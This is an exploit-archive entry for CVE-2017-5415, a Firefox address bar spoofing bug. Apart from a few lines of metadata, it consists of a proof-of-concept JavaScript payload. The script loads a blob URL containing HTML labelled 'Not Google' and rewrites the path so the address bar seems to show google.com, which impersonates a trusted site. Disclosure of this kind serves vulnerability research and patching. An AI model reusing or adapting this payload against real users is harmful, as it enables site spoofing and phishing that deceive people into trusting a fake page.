Mozilla Firefox - Address Bar Spoofing



EKU-ID: 48215 CVE: CVE-2017-5415 OSVDB-ID:
Author: 649 Published: 2017-04-14 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


<script>
location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
</script>